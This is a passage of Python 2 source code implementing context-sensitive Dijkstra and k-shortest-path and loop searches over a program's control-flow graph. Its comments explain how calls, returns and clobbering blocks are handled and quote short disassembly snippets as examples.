precalculate them\n                spurpath, spurpathlens, spurexpaths = \\\n                            self.__shortest_path(spur, destination, cur_uid, self.__get_precall_stack(A[k-1], spur))\n\n\n                # print \"TRY SP\", hex(spur), hex(destination), pretty_list(spurpath)\n                        \n                length = spurpathlens[-1]\n\n\n                # if path exists                \n                if length > 0 and length < INFINITY:\n                    path = rootpath[:-1] + spurpath\n\n                    # append lengths of the root path to the spur path\n                    pathlens = L[k-1][:i] + map(lambda l: l + rootpathlen, spurpathlens)\n\n                    # do the same with expanded (sub)paths\n                    expaths = E[k-1][:i][:]\n\n                               # prepend for the root subpath on every spur subpath (use [:] to make copies)\n                    for expath in spurexpaths:\n                        if i > 0:\n                            expaths.append( E[k-1][i-1][:] + expath[:] )\n                        else:\n                            expaths.append( expath[:] )\n\n\n                    # Add potential shortest path to the heap\n\n\n                    # Paths that invoke the same function multiple times, cause the algorithm\n                    # to return the same path multiple times (because the spur path can visit\n                    # (expand) this function, thus resulting a new path that is actually the same).\n                    #\n                    # To fix that, we look at the expanded paths (where all functions are expanded)\n                    # so we can quickly discard duplicates.\n                    is_unique = True\n\n                    for expath in prev_expaths:     # for each previous expanded path\n                        if not cmp(expath, expaths[-1]):\n                            is_unique = False       # path is not unique. Discard it\n                            break\n\n\n                    # if path is unique add it to the list and to the heap\n                    if is_unique: \n                        prev_expaths.append(expaths[-1])                 \n                        heapq.heappush(B, (length+rootpathlen, path, pathlens, expaths) )\n\n\n                # print '\\t\\tCLEAR ALL DROPS'\n\n                # add back the edges and nodes that have been \"deleted\" from the graph.                     \n                # (simply delete \"avoid\" attributes from them)\n                for node, _ in nx.get_node_attributes(self.__G, 'avoid').items(): \n                    del self.__G.node[ node ]['avoid']                  \n            \n                for edge, _ in nx.get_edge_attributes(self.__G, 'avoid').items():                   \n                    del self.__G[ edge[0] ][ edge[1] ]['avoid']\n\n\n            if not B:\n                # if heap is empty then there are no spur paths. This is the case when all spur\n                # paths have already added to A, or when there is no path between source and\n                # destination.\n                break\n                \n            # A[k] = shortest path from heap\n            cost, path, pathlens, expaths = heapq.heappop(B)\n            \n            A.append(path)                          # add path to A\n            L.append(pathlens)                      # add path lengths to L\n            E.append(expaths)                       # add expanded paths to E\n       \n            yield cost, expaths[-1]                 # return next path (expanded version)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # k_shortest_loops(): As the name suggests, this function finds the k shortest loops (cycles)\n    #       starting from a given source. To do that, we find the k shortest paths from the source\n    #       to each source predecessor and we add one more edge to form the cycle. Then, we simply\n    #       select the k shortest cycles (as we can have up to k paths for each predecessor).\n    #\n    # :Arg source: The source node\n    # :Arg cur_uid: UID of the SPL statement that is about to execute\n    # :Arg K: The number of loops to search for\n    # :Ret: This function is actually a generator. Every time that's invoked it returns a tuple \n    #       (cost, cycle) that contains the cost of the next cycle  with that cycle. If such a\n    #       loop does not exists, function returns (-1, []).\n    #\n    def k_shortest_loops( self, source, cur_uid, K ):        \n        heap = []                                   # heap to store all nodes\n\n        # for each predecessor & for each of the (up to) K shortest paths\n        for destination in ADDR2NODE[source].predecessors:\n            for length, path in self.k_shortest_paths(source,  destination.addr, cur_uid, K):\n                if length != INFINITY:\n\n                    # The last edge that we add, might be in a different context (this happens\n                    # when the predecessor edge is a return). If our context is right, the\n                    # precall stack will have 0 or 1 elements. In the 2nd case, that element\n                    # and the source must be a valid edge in the CFG with the \"fakeret\" attribute.\n                    callstack = self.__get_precall_stack(path)\n\n                    if len(callstack) == 1 and \\\n                        not self.__G.has_edge(self.__f(callstack[0]), self.__f(source)):\n                            continue                # loop out of context\n\n\n                    # add the predecessor edge to complete the cycle\n                    heapq.heappush(heap, (length + 1, path + [source]))\n\n\n        # yield the (up to) K minimum cycles\n        while len(heap) > 0 and K > 0:\n            yield heapq.heappop(heap)               # return length, path              \n            K -= 1                                  # decrement K\n\n                  \n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _cfg_shortest_path: This module calculates shortest paths within a CFG. Searching for shortest\n#   paths in a CFG is not as simple as searching for shortest paths in a regular graph, as paths\n#   are context sensitive. Let's see a counterexample:\n#\n#                        +              +----------> foo\n#                        |              |             +\n#                    call foo           |             |\n#                        | <----------------+         |\n#                       {B}             |   |         |\n#                        |              |   |         |\n#                        |              |   |         |\n#                       {A}             |   |         |\n#                        |              |   |         |\n#                    call foo +---------+   |         |\n#                        |                  |         v\n#                        v                  +------+ retn\n#\n#   Let's assume that our code doesn't have any loops. This means that it's impossible to move from\n#   {A} to {B} under program execution and hence, such a path should not exist. However, if we\n#   apply a classic shortest path algorithm (e.g., Dijkstra), we will find a path, that goes from\n#   {A} to foo(), then to the return point of foo() and then to the instruction right after the 1st\n#   call thus ending up at {B}. The main cause of this issue is that in CFG, a block with a retn,\n#   has an edge to every possible return point and the shortest path algorithm does not take into\n#   consideration the current \"context\".\n#\n#   A naive solution here, is to keep track of the current path, using backpointers. Every time we\n#   encounter a return instruction, we move backwards to the point that this function was invoked\n#   and we pick the appropriate edge, that take us to the instruction right after call.\n#   \n#   The problem with this solution, is that it can easily fall into a _deadlock_. For instance,\n#   consider the case where we have two paths in the priority queue. The 1st path has visited few\n#   blocks of some function foo(), and therefore they are marked as visited. Now, the 2nd path\n#   reaches a block that calls foo(). If foo() has already been analyzed, we can simply follow the\n#   \"fakeret\" edge and use foo()'s length (or \"depth\") as edge weight. Unfortunately,we don't know\n#   that (as it's under inspection by the 1st path) and we can't visit it twice, thus creating a\n#   deadlock\n#\n#\n#   The problem gets even harder when CFG contains recursive functions or sets of functions that\n#   form a cycle in the Call Graph). Our approach is to use a variant of Dijkstra's algorithm. If\n#   a function doesn't have any callees, a classic Dijsktra suffices to find out the shortest \n#   paths. Otherwise, we recursively do a Dijkstra for each calling function. Thus, we can get each\n#   function's depth before we continue searching. Finally, we also need a Call Stack to avoid\n#   infinity loops when we analyze recursive functions.\n#\nclass _cfg_shortest_path( _cs_ksp_intrl ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __valid_neighbors(): Given a node, find all \"valid\" neighbors (remember not all edges in CFG\n    #       are valid).\n    #\n    # :Arg node: Node to find it's neighbors.\n    # :Ret: A list of all neighbor nodes.\n    # \n    def __valid_neighbors( self, node ):\n        # get all node's neighbors as tuples (node, jumpkind)\n        neighbors = [ (n, self.__G.get_edge_data(node, n)['jumpkind']) \n                        for n in self.__G.neighbors(node) ]\n\n        jumps = [ j for (n,j) in neighbors ]        # isolate jump kinds\n\n        # Uncomment the following line to return all targets and behave like a normal BFS:\n        #       return [n for n,_ in neighbors]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #1: syscall\n        # \n        # When node ends with a syscall, it has 2 edges: One to the node after syscall \n        # (marked as Ijk_FakeRet) and one to an internal node for syscall (marked as \n        # Ijk_Sys_syscall). We only care about the 1st case.\n        # -------------------------------------------------------------------------------\n        if   ['Ijk_FakeRet', 'Ijk_Sys_syscall'] == jumps: return [neighbors[0][0]]      \n        elif ['Ijk_Sys_syscall', 'Ijk_FakeRet'] == jumps: return [neighbors[1][0]]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #2: call\n        #\n        # When node ends with a call, it has 2 edges: One to the function's entry point\n        # (marked as Ijk_Call) and one the node after call (marked as Ijk_FakeRet). If\n        # it's the 1st time we visit this function, we use the 1st edge in order to \n        # analyse function. Othewise, we use the 2nd edge and we set the weight to be\n        # equal with function's minimum depth (from entry point to the shortest exit).\n        # -------------------------------------------------------------------------------\n        elif ['Ijk_FakeRet', 'Ijk_Call'] == jumps:\n            # return caller function as well (but mark it first)\n            # caller should be returned first\n            return [(neighbors[1][0], 'caller', neighbors[0][0])]\n            \n            '''\n            if neighbors[1][0].addr in self.__depth:                \n                self.__G[ node ][ neighbors[0][0] ]['depth'] = self.__depth[neighbors[1][0].addr]\n                return [neighbors[0][0]]\n            else: \n                return [neighbors[1][0]]\n            '''\n\n        elif ['Ijk_Call', 'Ijk_FakeRet'] == jumps:          \n            # return caller function as well (but mark it first)\n            return [(neighbors[0][0], 'caller', neighbors[1][0])]\n\n            '''\n            if neighbors[0][0].addr in self.__depth:        \n                self.__G[ node ][ neighbors[1][0] ]['depth'] = self.__depth[neighbors[0][0].addr]\n                return [neighbors[1][0]]\n            else:           \n                return [neighbors[0][0]]\n            '''\n\n        elif ['Ijk_Call'] == jumps:\n            # in that case, return block is missing, so we skip it\n            return [(neighbors[0][0], 'caller', -1)]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #3: retn\n        #\n        # In case of a return, we're using back pointers to move backwards in current\n        # path, until we find a node with a Ijk_FakeRet edge that points to a node in\n        # the return list (the Ijk_Ret edges).\n        #\n        #\n        # UPDATE: In the \"Recursive Dijkstra\" approach, a return block indicates the\n        # end of the search and therefore, we don't have to look for the block after\n        # the caller.\n        # -------------------------------------------------------------------------------\n        elif 'Ijk_Ret' in jumps:\n            return []                   # the party stops here....\n\n            '''\n            # get edge's jump kind or None if edge doesn't exit\n            edge = lambda u, v: self.__G.get_edge_data(u, v)['jumpkind'] \\\n                             if self.__G.get_edge_data(u, v) else None\n\n            # get all nodes with Ijk_Ret edges\n            ret = [(n,j) for (n,j) in neighbors if j == 'Ijk_Ret']\n\n            curr  = node\n            depth = 0 \n\n            while curr > 0:                         # while we haven't reach root\n                # get edges from curr to all return targets\n                caller = [n for n,_ in ret if edge(curr, n) == 'Ijk_FakeRet']\n\n                if caller:                          # caller found!\n                    self.__G[ curr ][ caller[0] ][ 'depth' ] = depth\n                    self.__depth[ prev.addr ] = depth\n\n                    return caller                   # caller is unique                  \n\n                prev = curr                         # ow, move one step back\n                curr = self.__backpointer.get(curr.addr, _NULL_NODE)\n\n                if curr == _NULL_NODE: return []\n\n                # increase function's depth (if there are nested functions, accumulate depth)\n                depth += 1 + self.__G[ curr ][ prev ].get('depth', 0)\n\n\n            # this point should never be reached\n            '''\n        \n\n        # -------------------------------------------------------------------------------\n        # Case #4: Other jumps (Ijk_boring)\n        #\n        # For the rest of the jumps, we keep all edges.\n        # -------------------------------------------------------------------------------   \n        else: return [n for n,_ in neighbors]\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    ''' # Old Shortest Path algorithm (keep it for reference) #\n\n    # ---------------------------------------------------------------------------------------------\n    # __bfs_variant(): Calculate the shortest paths from root to all final nodes, using a variant\n    #       of classic Breadth First Search (BFS) algorithm. This algorithm has an extra feature:\n    #       it _avoids_ all the nodes and edges that have the \"avoid\" attribute. In some cases we\n    #       we need to find a path that doesn't contain some specific edges/nodes. Thus, instead\n    #       of deleting and adding them later, we simply mark them as \"avoid\" and we instruct the\n    #       algorithm to ignore them during searcing.\n    # \n    # :Arg root: node to start from searching\n    # :Arg finals: a list of all target nodes\n    # :Ret: A list of tuples with the length and the path for each final node.\n    #   \n    def __bfs_variant( self, root, finals=[] ):     \n        nleft  = len(finals)                        # number of final nodes\n        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)\n\n        visited              = { }                  # visited nodes\n        visited[ root.addr ] = 0                    # distance from root is 0\n\n        self.__backpointer            = { }         # backpointers      \n        self.__backpointer[root.addr] = _NULL_NODE  # root has no parent\n\n        self.__depth = { }                          # function's min depth\n\n\n        # clear leftovers in CFG from previous calls\n        for n, _ in nx.get_edge_attributes(self.__G,'depth').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['depth']\n\n\n        # -------------------------------------------------------------------------------\n        # start searching\n        # -------------------------------------------------------------------------------\n        if 'avoid' in self.__G.node[ root ]:        # if root must be avoided\n            return -1, []                           # abort\n\n\n        Q = queue.Queue()\n        Q.put( root )                               # push root node to the queue\n\n        while not Q.empty():                        # while there are unvisited nodes\n            v = Q.get()                             # get front node\n\n            if v in finals_d:                       # is current node in finals?            \n                nleft -= 1      \n                if nleft <= 0: break                # all final nodes have been found\n\n            for n in self.__valid_neighbors( v ):   # for each neighbor node\n\n\n                # TODO: exculde clobbering nodes\n                \n                # ignore nodes and edges that marked as \"avoid\"\n                if 'avoid' in self.__G.node[ n ] or 'avoid' in self.__G[ v ][ n ]:\n                    continue\n\n\n                if n.addr not in visited:           # if not visited, push it to the queue\n\n                    self.__backpointer[n.addr] = v  # set backpointer to the parent node\n                    Q.put( n )                      # push node on queue\n\n                    # set node's shortest path accordingly                  \n                    visited[n.addr] = visited[v.addr] + 1 + self.__G[ v ][ n ].get('depth', 0)\n\n\n        # -------------------------------------------------------------------------------\n        # Search has finished. Extract paths\n        # -------------------------------------------------------------------------------\n        sp = []                                     # list of shortest paths\n\n        for n in finals:                            # for each final node           \n            path = []\n            p = n\n            \n            while p > 0:                            # go all the way up to the root         \n                path.insert(0, int(p.addr) )        # add node to the path (in reverse order)\n                p = self.__backpointer.get(p.addr, -1)\n                \n                \n            # if final node is not visited, set distance to -1\n            sp.append( (visited.get(n.addr, -1), path) )\n            \n        return sp # return list of tuples\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __depth_metric(): Determine the metric for measuring function's depth. This function tries\n    #       to estimate the minimum number of distinct basic blocks that should be executed within \n    #       a function. To do that, one should look at the shortest paths from the entry point to\n    #       all final basic blocks (those that end with a return instruction) and select as depth\n    #       the length of the minimum of these (shortest) paths.\n    #\n    #       However this metric might not always work well, as it's very common to make argument \n    #       checks at the very early stages of a function and abort if they do not meet the \n    #       requirements.\n    #   \n    #       To fix that, this function offers 3 metrics: The minimum among the shortest paths, the\n    #       maximum and the median of all shortest paths. We leave the final decision up to the \n    #       user.\n    #\n    # :Arg retns: A list of tuples (dist, path) that contains all shortest paths to a final block\n    #             along with their distances\n    # :Ret: Function's depth along with a path (if applicable).\n    #\n    def __depth_metric( self, retns ):\n        if not len(retns): return 0, []\n\n        # getting the median is tricky, so we have to sort all return paths first\n        sorted_retns = sorted(retns[:], key=lambda x: x[0])\n\n        if FUNCTION_DEPTH_METRIC == 'min':                   \n            return sorted_retns[0]\n        \n        elif FUNCTION_DEPTH_METRIC == 'max':            \n            return sorted_retns[-1]\n        \n        elif FUNCTION_DEPTH_METRIC == 'median':\n            return sorted_retns[len(sorted_retns) >> 1]\n\n        else:\n            fatal(\"Invalid value for 'FUNCTION_DEPTH_METRIC'!\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __clob_stmts(): This function finds all SPL statements whose accepted blocks are clobbering\n    #       with a given statement. This is essentially a Depth First Search (DFS) on the Reverse\n    #       Adjacency list (self.__radj) starting from current statement. This is due to the time\n    #       sensitivity of the clobbering blocks; thtat is a clobbering block becomes truly \n    #       clobbering *after* the execution of some SPL statement.\n    #   \n    # :Arg cur_uid: of Current statement's UID\n    # :Ret: Function returns a set of all statement UIDs whose blocks are _effectively_ clobbering.\n    #\n    def __clob_stmts( self, cur_uid ):\n        if not self.__clobbering:           # if clobbering blocks are ignored\n            return set()                    # skip it\n\n        if cur_uid != START_PC and cur_uid not in self.__radj:\n            fatal(\"Statement with uid '%d' is not in the reverse adjacency list\" % cur_uid)\n\n        clobs = set()                       # clobbering (visited) statements\n        stack = [cur_uid]                   # start from root\n\n        while stack:\n            curr = stack.pop()              # get top element of the stack\n\n            if curr not in clobs:\n                clobs.add(curr)             # mark it\n                \n                if curr in self.__radj:     # add reverse neighbors, if any (up to 2)\n                    stack.extend( self.__radj[curr] )\n\n        return clobs                        # return clobbering statement set\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_variant_rcsv(): This is the recursive variant of Dijkstra's algorithm that we\n    #       described above.\n    #\n    # :Arg root: node to start searching from\n    # :Arg finals: a list of all target (final) nodes\n    # :Arg precall_stack: Current precall stack\n    # :Arg init_dist: Initial distance to start from (i.e., distance from initial root)\n    # :Ret: Function return  two lists of tuples. The first list contains the length and the path\n    #       path for each final node. The second list contains the length and the path for each\n    #       return node.\n    #\n    def __dijkstra_variant_rcsv( self, root, finals=[], precall_stack=[], init_dist=0 ):\n        nleft    = len(finals)                      # number of final nodes\n        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)\n\n        Q        = queue.PriorityQueue()            # implement it using a prioirty queue\n        retn_s   = [ ]                              # return node set\n\n\n        dbg_prnt(DBG_LVL_4, 'Starting recursive Dijkstra at: 0x%x (%s). Pre-call Stack: %s' % \n                 (root.addr, func_name (root.addr), pretty_list(precall_stack, ', ')))\n\n\n        # if root is clobbering skip it (function is recursive, root may not be the top node)\n        if 'clobbering' in self.__G.node[ root ]:\n                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)\n\n        # if root node must be avoided (in the current context), or if it's already in the\n        # Call Stack, return non-existing path(s).\n        if 'avoid' in self.__G.node[root] and precall_stack == self.__G.node[root]['avoid'] or \\\n            root in self.__callstack:\n                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)\n\n\n        self.__callstack[root] = 1\n        self.__dist[root]      = init_dist          # distance from root \n\n\n        # when function has multiplee callers, just keep the 1st one for the shortest path\n        if root not in self.__backpointer:\n            self.__backpointer[root] = -1           # root has no parent\n\n\n        # -------------------------------------------------------------------------------\n        # Main Dijkstra loop\n        # -------------------------------------------------------------------------------\n        Q.put(_queue_obj(root, self.__dist[root]))  # add root to the queue\n\n        while not Q.empty():                        # while there are vertices in the queue\n            u = Q.get().data                        # get front node's data\n\n        \n            # print node with minimum cost\n            if self.__backpointer[u] == -1: n, a = '-1', 0xffffffff\n            else: n, a = self.__backpointer[u].name, self.__backpointer[u].addr\n\n            dbg_prnt(DBG_LVL_4, \"\\tSelect min: %3d 0x%x (%s)\\t<-- 0x%x (%s)\" % \n                                    (self.__dist[u], u.addr, u.name, a, n))\n\n\n            # In practise, paths lengths are not longer than MAX_ALLOWED_SUBPATH_LEN, as\n            # it's highly unlikely to have satisfiable constraints. Therefore we stop once\n            # a path reaches its upper bound, to boost our algorithm.\n            if self.__dist[u] > MAX_ALLOWED_SUBPATH_LEN:\n                continue                            # discard current path\n\n\n            if u in finals_d:                       # is current node in finals?                       \n                nleft -= 1\n                if nleft <= 0: break                # all final nodes have been found\n\n            if u.has_return: retn_s.append(u)       # returns nodes are needed too\n\n\n\n            # check all (valid) neighbors for the current node\n            for v in self.__valid_neighbors( u ):\n\n                # -----------------------------------------------------------------------\n                # Is current block a caller?\n                # -----------------------------------------------------------------------\n                if isinstance(v, tuple) and v[1] == 'caller':\n\n                    # ignore clobbering nodes\n                    if 'clobbering' in self.__G.node[ v[0] ]:\n                            continue\n\n                    # ignore nodes and edges that marked as \"avoid\"                \n                    if 'avoid' in self.__G.node[v[0]] and precall_stack == self.__G.node[v[0]]['avoid'] or \\\n                       'avoid' in self.__G[u][v[0]]   and precall_stack == self.__G[u][v[0]]['avoid']:\n                            continue\n\n                  \n                    # if function is not yet analyzed\n                    if v[0] not in self.__funcdepth:            \n                        # It is possible that the function is not in __funcdepth but it is still\n                        # visited. This happens when 1) function is recursive or 2) function was\n                        # invoked through a jmp before the call. For instance:\n                        #   \n                        #        .text:0000000000410FC0 cipher_decrypt  proc near\n                        #        .....\n                        #        .text:0000000000411021        mov     context, [rsp+1A8h+var_10]\n                        #        .text:0000000000411029        mov     src, [rsp+1A8h+var_8]\n                        #        .text:0000000000411031        add     rsp, 1A8h\n                        #        .text:0000000000411038        jmp     _memcpy        \n                        #\n                        #        .plt:0000000000403A70 _memcpy         proc near\n                        #        .plt:0000000000403A70        jmp     cs:off_621528\n                        #\n                        #\n                        # In both cases, we don't touch the function if its root is already visited\n                        if self.__dist[v[0]] <= self.__dist[u] + 1:\n                            continue\n\n\n                        # set distance to the root node\n                        self.__dist[v[0]]        = self.__dist[u] + 1\n                        self.__backpointer[v[0]] = u\n\n\n                        # Recursively call Dijkstra for the new function\n                        F, R = self.__dijkstra_variant_rcsv(v[0], finals, precall_stack + [u.addr], \n                                                            self.__dist[u] + 1)\n\n                        # estimate function's depth\n                        #\n                        # Note that if function has no returns, then cost will be 0 and P may not\n                        # be applicable\n                        cost, P = self.__depth_metric(R)\n                        self.__funcdepth[ v[0] ] = (cost, P)\n\n\n                        # All return paths have now their backpointers set. \n                        # We select P as return path (according to __depth_metric)\n                        R = [(cost, P)]\n\n                        \n                        dbg_arb(DBG_LVL_4,  '\\tF set:', [(f[0], pretty_list(f[1])) for f in F])\n                        dbg_arb(DBG_LVL_4,  '\\tR set:', [(r[0], pretty_list(r[1])) for r in R])\n                        dbg_prnt(DBG_LVL_4, '\\tP set: %s' % pretty_list(P))\n                        dbg_prnt(DBG_LVL_4, \"\\tFunction '%s' has depth %d\" % (v[0].name, cost))\n\n                    else:\n                        R = []                      # in that case, R is empty\n                        \n                        # is function is already analyzed, just use its paths\n                        # (+1 to jump the function and +1 to return from it)\n\n                        if v[2] != -1:              # check if there's an edge\n                            self.__G[ u ][ v[2] ]['depth'] = self.__funcdepth[ v[0] ][0] +1 +1\n                            self.__G[ u ][ v[2] ]['path']  = self.__funcdepth[ v[0] ][1]\n\n\n                    # -------------------------------------------------------------------\n                    # at this point, __funcdepth is set (unless dist[v[0]] <= dist[u]+1)\n                    # -------------------------------------------------------------------\n                    try:\n                        altd = self.__dist[u] + 1 + self.__funcdepth[ v[0] ][0] + 1\n                    except KeyError:\n                        altd = INFINITY             # function root is visited but depth is unknown\n\n\n\n                    # if there's no return, skip this edge\n                    if v[2] == -1:\n                        warn(\"Caller 0x%x (%s) has no return\" % (v[0].addr, v[0].name), DBG_LVL_4)\n                        continue\n\n                    # v[2] may also be clobbering\n                    if 'clobbering' in self.__G.node[ v[2] ]:\n                            continue\n\n                    if altd < self.__dist[v[2]]:    # if alternative path is shorter, ute it\n                        self.__dist[v[2]]        = altd\n                        self.__backpointer[v[2]] = u\n                        \n                        Q.put(_queue_obj(v[2], altd))\n\n\n                        # Now go back and fix backpointers\n                        #\n                        # it might be possible to not have this edge in the CFG. For example:\n                        # \n                        #       .text:000000000040E00D         mov     rdi, ch_0\n                        #       .text:000000000040E010         call    chan_write_failed\n                        #       .text:000000000040E015         mov     ecx, [ch_0+10h]\n                        #\n                        #       .text:00000000004124E0 chan_write_failed proc near\n                        #       .text:0000000000412552         jmp     chan_delete_if_full_closed\n                        #\n                        #       .text:00000000004122E0 chan_delete_if_full_closed proc near\n                        #       .text:000000000041230C         jmp     channel_free\n                        #   \n                        #       .text:000000000040DA30 channel_free proc near\n                        #       .text:000000000040DAD2         pop     rbx\n                        #       .text:000000000040DAD3         retn\n                        #        \n                        # Here, returning from channel_free(), should bring us to 0x40e015, however\n                        # this edge may not be exists. Therefore we need to add an 'Ijk_Ret' edge.\n                        if R:\n                            for _, retn in R:\n                                for a, b in to_edges(retn, direction='backward'):                               \n                                    self.__backpointer[ADDR2NODE[a]] = ADDR2NODE[b]\n                                \n                                if len(retn) > 1:   # fix the last backpointer\n                                    self.__backpointer[v[2]] = ADDR2NODE[a]\n\n                                    # add the edge (if not exists)\n                                    if not self.__G.has_edge(ADDR2NODE[a], v[2]):\n                                        self.__G.add_edge(ADDR2NODE[a], v[2], jumpkind='Ijk_Ret')\n\n\n                            # This is not needed as we start distances from init_dist\n                            #   for r in retn[1:]:\n                            #       self.__dist[ ADDR2NODE[r] ] += self.__dist[u] + 1;\n\n\n                # -----------------------------------------------------------------------\n                # Block is not a caller\n                # -----------------------------------------------------------------------\n                else:       \n                    # if node is clobbering skip it\n                    if 'clobbering' in self.__G.node[v]:\n                            continue\n\n                    # ignore nodes and edges that marked as \"avoid\"\n                    if 'avoid' in self.__G.node[v] and precall_stack == self.__G.node[v]['avoid'] or \\\n                       'avoid' in self.__G[u][v]   and precall_stack == self.__G[u][v]['avoid']:\n                            continue\n\n                    # Although we handle this case pretty well, we still highlight it\n                    if u.addr in ADDR2FUNC and v.addr in ADDR2FUNC and ADDR2FUNC[u.addr] != ADDR2FUNC[v.addr]:\n                        warn(\"Node 0x%x (%s) transfers control to '%s'\" %\n                                (u.addr, u.name, ADDR2FUNC[v.addr].name), DBG_LVL_4)\n                        \n            \n                    # check if the alternative path is better\n                    altd = self.__dist[u] + 1\n                    if altd < self.__dist[v]:       # if alternative path is shorter, use it\n                        self.__dist[v]        = altd\n                        self.__backpointer[v] = u\n                        \n                        Q.put(_queue_obj(v, altd))  # and add it to the queue\n\n\n        # pop current function from Call Stack before return\n        del self.__callstack[root]\n\n\n        # -------------------------------------------------------------------------------\n        # Search has finished. Extract paths\n        # -------------------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_4, 'Leaving recursive Dijkstra at 0x%x (%s). Return Set: %s' % \n                                (root.addr, root.name, pretty_list(retn_s, ', ')))\n\n\n\n        # -------------------------------------------------------------------------------\n        # extr_paths(): This internal function extracts all paths from the return blocks\n        #       to the root, using the backpointers.\n        #\n        # :Arg final_blks: A set of all basic blocks that have a return instruction\n        # :Ret: Function\n        #\n        def extr_paths( final_blks ):\n            paths = []                              # list of shortest paths            \n\n            for n in final_blks:                    # for each final node\n                path  = []\n                p     = n\n                found = False\n\n                dbg_prnt(DBG_LVL_4, \"\\tExtracting (reverse) path from 0x%x to 0x%x\" %  \n                                            (n.addr, root.addr))\n        \n                while p > 0:                        # go all the way up to the root                        \n                    dbg_prnt(DBG_LVL_4, \"\\t\\t%3d 0x%x (%s)\" % (self.__dist.get(p, -1), p.addr, p.name))                 \n\n\n                    path.insert(0, int(p.addr) )    # add node to the path (in reverse order)\n\n                    if p == root:                   # if you reach root, stop\n                        found = True\n                        break\n               \n                    if p in path:                   # cycles will make loop infinite\n                        fatal('Backpointers contain a loop. Abort')\n\n                    p = self.__backpointer.get(p, -1)\n\n                  \n                # if final node is not visited or root is not found, set distance to -1                \n                if not found:\n                    distance = INFINITY\n                else:               \n                    distance = self.__dist.get(n, INFINITY)\n                    if distance != -1 and distance != INFINITY:\n                         distance -= init_dist\n\n                dbg_prnt(DBG_LVL_4, \"\\t\\tFinal Distance: %d (Initial Distance: %d)\" % \n                                        (distance, init_dist))\n\n                # append path to the shortest path list             \n                paths.append( (distance, path if distance < INFINITY else []) )                    \n\n\n            return paths\n\n\n\n        # -------------------------------------------------------------------------------\n\n        return extr_paths(finals), extr_paths(retn_s)\n    \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_variant(): This function essentially bootstraps the recursive Dijsktra algorithm.\n    #\n    # :Arg root: node to start from searching\n    # :Arg finals: a list of all target nodes\n    # :Arg cur_uid: Current statement's UID\n    # :Arg precall_stack: Current precall stack\n    # :Ret: A list of tuples with the length and the path for each final node.\n    #\n    def __dijkstra_variant( self, root, finals=[], cur_uid=-1, precall_stack=[] ):\n        self.__dist        = { }                    # visited nodes\n        self.__backpointer = { }                    # backpointers      \n        self.__callstack   = { }                    # call \"stack\" to prevent infinite recursions\n        self.__funcdepth   = { }                    # function depths \n\n\n        clobs = self.__clob_stmts(cur_uid)          # set of clobbering block UIDs to avoid\n\n\n        # UPDATE: Yes they are. Think about calls with clobbering arguments ;)\n        #\n        #   # the first and last nodes are never clobbering\n        #   nonclob = [root.addr] + [final.addr for final in finals]\n\n        # exclude clobbering blocks from search (mark them so they can be avoided)\n        for addr, uidlist in self.__clobbering.iteritems():            \n            # if addr not in nonclob and not disjoint(set(uidlist), clobs):\n            if not disjoint(set(uidlist), clobs):\n                self.__G.node[ ADDR2NODE[addr] ]['clobbering'] = 1\n               \n        \n        # initialize all node distances to INF\n        for vtx, _ in self.__G.nodes_iter(data=True):\n            self.__dist[vtx]        = INFINITY\n            self.__backpointer[vtx] = -1\n\n\n        try:\n            # get shortest paths to all final nodes (ignore the return nodes)\n            paths, _ = self.__dijkstra_variant_rcsv(root, finals, precall_stack=precall_stack)\n        except Exception, e:                        # just in case that something goes wrong                       \n            traceback.print_exc()                   # print exception trace\n            fatal('Unexpected exception in __dijkstra_variant_rcsv(): %s' % str(e))\n\n\n        # print function depths (DBG_LVL_4 only)        \n        dbg_prnt(DBG_LVL_4, '\\tFunction Depths:')\n\n        for func, (depth, path) in self.__funcdepth.iteritems():\n            dbg_prnt(DBG_LVL_4, '%32s: %2d (%s)' % (func.name, depth, pretty_list(path)))\n\n\n        # print path(s) to the user (DBG_LVL_3 and DBG_LVL_4 only)\n        for final, path in zip(finals, paths):\n\n            if path[0] != INFINITY:\n                dbg_prnt(DBG_LVL_3, \"\\tShortest Path (%x -> %x) found (%d): %s\" % \n                                    (root.addr, final.addr, path[0], pretty_list(path[1], ' -> ')))\n\n            else:\n                dbg_prnt(DBG_LVL_4, \"\\tNo Shortest Path (%x -> %x) found!\" % \n                                    (root.addr, final.addr))\n\n        # clean up clobbering nodes\n        for node, _ in nx.get_node_attributes(self.__G, 'clobbering').items(): \n            del self.__G.node[ node ]['clobbering']                  \n\n\n        return paths                                # return shortest paths (1 for each final node)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __spur_shortest_path(): This function finds the shortest path between spur and destination\n    #       nodes. Function first finds the shortest path using __dijkstra_variant() and then\n    #       calculates the spur path lengths and the expanded spur paths. This information is\n    #       needed for k_shortest_paths(), because 'depth' attributes are cleared every time we\n    #       calculate a spur path and hence it becomes impossible to calculate the length of a\n    #       subpath. Therefore we precalculate all the lengths for all subpaths from root to the\n    #       i-th node, in order to reuse them later on in k_shortest_paths().\n    #\n    # :Arg spur: Spur node\n    # :Arg dst: Destination node (must be exactly one)\n    # :Arg precall_stack: Current precall stack\n    # :Ret: If a shortest path exists, function returns a tuple (path, pathlens, expaths) that\n    #       contains the path, the spur path lengths and the expanded spur paths. Otherwise,\n    #       function returns a tuple with pathlens being set to [-1].\n    #\n    def __spur_shortest_path( self, spur, dst, cur_uid=-1, precall_stack=[] ):\n        # ---------------------------------------------------------------------\n        # Clear leftovers in CFG from previous calls. \n        